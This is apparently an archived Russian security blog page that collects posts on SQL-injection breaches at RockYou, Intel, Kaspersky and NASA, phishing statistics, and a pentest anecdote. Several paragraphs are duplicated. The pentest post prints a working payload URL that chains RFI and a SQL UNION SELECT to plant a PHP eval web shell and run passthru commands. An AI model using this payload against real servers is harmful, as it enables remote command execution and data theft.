Всем хорошо и с пользой провести новогодние праздники:) Удачных начинаний в новом году!
Скомпрометированы более 32 миллионов учетных записей (последствия атаки на сайт RockYou.com)
Стало известно, что хакеру, скрывающемуся под псевдонимом "igigi", удалось скомпрометировать базу пользователей сайта RockYou.com путем проведения атаки через классическую уязвимость SQL Injection. Портал RockYou.com предоставляет различные услуги социальным сетям, в том числе таким, как Facebook и MySpace. В своем блоге "igigi" подробно описывает проведенную им атаку. Наиболее ценными данными, которыми завладел хакер, является база пользователей на 32.603.388 позиций:
Обезличенная база паролей (без логинов, email’ов и другой чувствительной информации) была опубликованна на rapidshare.com, но на данный момент уже удалена и доступна только в торентах. Стоит заметить, что произошедший инцидент сумел попасть в TOP5 самых громких в уходящем году случаев утечки данных.
Обезличенная база паролей (без логинов, email’ов и другой чувствительной информации) была опубликованна на rapidshare.com, но на данный момент уже удалена и доступна только в торентах. Стоит заметить, что произошедший инцидент сумел попасть в TOP5 самых громких в уходящем году случаев утечки данных.
Intel website hacked
Уже ставший известным широкой аудитории по взломам сайтов "Лаборатории Касперского", Symantec, etc, хакер Unu вновь напомнил о себе. На этот раз исследователь откопал SQL-инъекцию на сайте компании Intel (Intel Channel Webinars, channeleventsponsors.intel.com), который функционирует в рамках программы дистрибуции IT-гиганта.
Поверхностно пробежавшись по доступным таблицам, наш герой заметил хранящиеся пароли администраторов в plain-тексте, а также таблички с яркими именами колонок, говорящими сами за себя: id, card_type, passport_dob, passport_number, passport_issue, passport_expiry, passport_nationality, passport_name, phone_number_cell, address1, city, card_issue_number, card_expire_date, card_cvv.
Поверхностно пробежавшись по доступным таблицам, наш герой заметил хранящиеся пароли администраторов в plain-тексте, а также таблички с яркими именами колонок, говорящими сами за себя: id, card_type, passport_dob, passport_number, passport_issue, passport_expiry, passport_nationality, passport_name, phone_number_cell, address1, city, card_issue_number, card_expire_date, card_cvv.
Поломали Twitter
Забавными новостями пестрит сегодняшние новостные ленты: "Twitter подвергся дефейсу", "Twitter подвергся нападению иранских хакеров", "Twitter Defaced by Iranian Hacktivists", etc. И в доказательство приводятся красивые картинки проведенного "дефейса":
Безопасность языком цифр #7
Как показывают работы по оценке осведомленности пользователей, при массовой рассылке электронных писем, от 30% до 40% сотрудников осуществляют переход по сомнительной ссылке, содержащейся в рассылаемом сообщении. Подобная ситуация наблюдается при оценке осведомленности, проводимой впервые. Для компаний, которые проводят подобные работы в течение 3-4 лет цифры несколько ниже (15% - 20%):
Проводя анализ защищенности конфигурации клиентов в тихом режиме (респект Валере Марчуку), при посещении web-узла, указанного в электронном сообщении, в этом году получены следующие данные:
То есть, от 20% до 35% компьютеров позволяют выполнить произвольный код и до 85% компьютеров содержат уязвимости различной степени критичности. Само по себе, выполнение произвольного кода внутри защищаемого периметра на целевых объектах, в ряде случаев позволяет сменить тип атакующего с внешнего нарушителя на внутреннего.
Проводя анализ защищенности конфигурации клиентов в тихом режиме (респект Валере Марчуку), при посещении web-узла, указанного в электронном сообщении, в этом году получены следующие данные:
То есть, от 20% до 35% компьютеров позволяют выполнить произвольный код и до 85% компьютеров содержат уязвимости различной степени критичности. Само по себе, выполнение произвольного кода внутри защищаемого периметра на целевых объектах, в ряде случаев позволяет сменить тип атакующего с внешнего нарушителя на внутреннего.
RFI over SQL Injection/Cross-Site Scripting
Забавная атака была продемонстрирована при последнем пентесте. Хороший пример жизненного применения Cross-Site Scripting. Ситуация выглядела следующим образом:
- Пользовательский сегмент, из которого работает атакующий (я в его роли);
- Технологическая сеть, трафик из которой жестко режется;
- Уязвимое Web-приложение к Remote File Including (RFI), расположенное в технологической сети;
- Уязвимое Web-приложение к SQL-инъекции, аналогично дислоцирующееся в технологическом сегменте сети.
Сама по себе SQL-инъекция не позволяла реализовать какие-либо полезные угрозы для развития атаки (вот она страшная сторона минимизации привилегий!). Воспользоваться уязвимостью RFI тоже не удалось, потому, как исходящий трафик из технологической сети жестко резался в пользовательский сегмент и во внешний мир. Для того, чтобы проэксплуатировать уязвимость RFI, была воссоздана приблизительно следующая цепочка:
http://<уязвимое_приложение_к_RFI>/?param=http://<уязвимое_приложение_к_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');
Т.е., по отдельности все три уязвимости были бесполезными. И лишь объединившись для единой благой цели, позволили реализовать угрозу ИБ – выполнение команд на сервере:)
В общем-то, ничего сверхъестественного, но мне подобная атака показалась очень даже забавной...
- Пользовательский сегмент, из которого работает атакующий (я в его роли);
- Технологическая сеть, трафик из которой жестко режется;
- Уязвимое Web-приложение к Remote File Including (RFI), расположенное в технологической сети;
- Уязвимое Web-приложение к SQL-инъекции, аналогично дислоцирующееся в технологическом сегменте сети.
Сама по себе SQL-инъекция не позволяла реализовать какие-либо полезные угрозы для развития атаки (вот она страшная сторона минимизации привилегий!). Воспользоваться уязвимостью RFI тоже не удалось, потому, как исходящий трафик из технологической сети жестко резался в пользовательский сегмент и во внешний мир. Для того, чтобы проэксплуатировать уязвимость RFI, была воссоздана приблизительно следующая цепочка:
http://<уязвимое_приложение_к_RFI>/?param=http://<уязвимое_приложение_к_SQLi>/?param=1+union+select+'<?eval($_request[cmd]);?>'&cmd=passthru('ls');
Т.е., по отдельности все три уязвимости были бесполезными. И лишь объединившись для единой благой цели, позволили реализовать угрозу ИБ – выполнение команд на сервере:)
В общем-то, ничего сверхъестественного, но мне подобная атака показалась очень даже забавной...
Kaspersky Websites Hacked (round two)
Сайтам Лаборатории Касперского вновь досталось от "доброго" зохера, скрывающегося под псевдонимом Unu. В этот раз, атаке подверглись ресурсы www.kaspersky.com.my и www.kaspersky.com.sg. Как это не банально прозвучит, но прозохать сайты удалось через классическую SQL-инъекцию:
Сайты NASA подверглись хакерской атаке
Появилось сообщение о том, что сайты www.istd.gsfc.nasa.gov и www.sed.gsfc.nasa.gov подверглись хакерской атаке (в настоящее время оба сайта не ресолвятся). Инцидент начался с того, что на сайте www.sed.gsfc.nasa.gov была обнаружена классическая SQL-инъекция:
Как можно понять по приведенному выше скриншоту в качестве базы данных используется MySQL v.5.x, которая запущена под Windows 2/3k. Права пользователя, по всей видимости, не позволяют работать с файловой системой, но классическая инъекция под 5-м мускулем – это всегда очень приятно:) т.к. позволяет легко и просто восстановить всю структуру базы и после, не спеша, дампить содержимое всех таблиц в пространстве СУБД, до которых позволяют дотянуться права на основе таблицы разграничения доступа.
Как можно понять по приведенному выше скриншоту в качестве базы данных используется MySQL v.5.x, которая запущена под Windows 2/3k. Права пользователя, по всей видимости, не позволяют работать с файловой системой, но классическая инъекция под 5-м мускулем – это всегда очень приятно:) т.к. позволяет легко и просто восстановить всю структуру базы и после, не спеша, дампить содержимое всех таблиц в пространстве СУБД, до которых позволяют дотянуться права на основе таблицы разграничения доступа.
Материалы с мастер-класса по SQLi на Hackday#2
Собрав оставшиеся силы джедая после недельного пентеста в славном городе Київ, и после недолгой остановки в Москве на 8-9 часов, переместился я в культурную столицу нашей необъятной родины - Санкт-Петербург. В минувшие выходные в нем проходило мероприятие с громким названием "Hackday #2".
На мероприятии уже ближе к вечеру я провел мастер-класс по теме "Внедрение операторов SQL". "Велосипед" на этот раз не выдумывал (а его от меня там и не требовали), а просто воспользовался наработками, которые в свое время готовились для института МИФИ. Собственно, материалы мастер-класса, который по времени уместился в один час, представлены ниже.
На мероприятии уже ближе к вечеру я провел мастер-класс по теме "Внедрение операторов SQL". "Велосипед" на этот раз не выдумывал (а его от меня там и не требовали), а просто воспользовался наработками, которые в свое время готовились для института МИФИ. Собственно, материалы мастер-класса, который по времени уместился в один час, представлены ниже.